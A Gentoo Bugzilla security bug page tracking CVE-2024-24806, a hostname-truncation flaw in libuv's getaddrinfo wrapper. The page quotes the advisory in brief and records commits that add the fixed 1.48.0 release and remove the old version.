Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 924127 (CVE-2024-24806) - <dev-libs/libuv-1.48.0: hostname truncation in getaddrinfo allows attacker-controlled lookup results
Summary: <dev-libs/libuv-1.48.0: hostname truncation in getaddrinfo allows attacker-co...
Alias: CVE-2024-24806
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Normal normal (vote)
Assignee: Gentoo Security
Whiteboard: A3 [glsa? cleanup]
Keywords: PullRequest
Depends on: 924653 924891
  Show dependency tree
Reported: 2024-02-08 22:30 UTC by Hank Leininger
Modified: 2024-04-20 13:31 UTC (History)
2 users (show)

See Also:
Package list:
Runtime testing required: ---


Note You need to log in before you can comment on or make changes to this bug.
Description Hank Leininger 2024-02-08 22:30:48 UTC
From $URL:

  The uv_getaddrinfo function in src/unix/getaddrinfo.c (and its windows 
  counterpart src/win/getaddrinfo.c), truncates hostnames to 256 characters 
  before calling getaddrinfo. This behavior can be exploited to create addresses 
  like 0x00007f000001, which are considered valid by getaddrinfo and could allow 
  an attacker to craft payloads that resolve to unintended IP addresses, 
  bypassing developer checks.

The advisory has some credible scenarios/exploit cases for nodejs code, kubernetes request routing, web portals with vanity hostnames, etc. libuv is also used by bind-tools (dig, host, nslookup) so one can imagine scripts that can be tricked with interesting results.

libuv 1.48.0 fixes the issue.
Comment 1 Larry the Git Cow gentoo-dev 2024-02-10 01:06:09 UTC
The bug has been referenced in the following commit(s):

commit b0bae683c34e84f5d252ce86b1fe844bd9445258
Author:     Hank Leininger <>
AuthorDate: 2024-02-09 22:06:06 +0000
Commit:     Jakov Smolić <>
CommitDate: 2024-02-10 01:02:31 +0000

    dev-libs/libuv: add 1.48.0, update SRC_URI
    Signed-off-by: Hank Leininger <>
    Signed-off-by: Jakov Smolić <>

 dev-libs/libuv/Manifest            |  1 +
 dev-libs/libuv/libuv-1.48.0.ebuild | 54 ++++++++++++++++++++++++++++++++++++++
 dev-libs/libuv/libuv-9999.ebuild   |  3 ++-
 3 files changed, 57 insertions(+), 1 deletion(-)
Comment 2 Larry the Git Cow gentoo-dev 2024-04-20 13:30:34 UTC
The bug has been referenced in the following commit(s):

commit 4f2af276017530099965ad9a89cdf0341d0246d1
Author:     Andreas Sturmlechner <>
AuthorDate: 2024-04-20 13:29:53 +0000
Commit:     Andreas Sturmlechner <>
CommitDate: 2024-04-20 13:30:05 +0000

    dev-libs/libuv: drop 1.47.0-r1
    Signed-off-by: Andreas Sturmlechner <>

 dev-libs/libuv/Manifest                            |  1 -
 dev-libs/libuv/files/libuv-1.47.0-darwin17.patch   | 26 ----------
 .../libuv/files/libuv-1.47.0-hppa-kernel.patch     | 32 ------------
 dev-libs/libuv/files/libuv-1.47.0-ipv6-tests.patch | 54 --------------------
 dev-libs/libuv/libuv-1.47.0-r1.ebuild              | 59 ----------------------
 5 files changed, 172 deletions(-)
Comment 3 Andreas Sturmlechner gentoo-dev 2024-04-20 13:31:02 UTC
Cleanup done, kde proj out.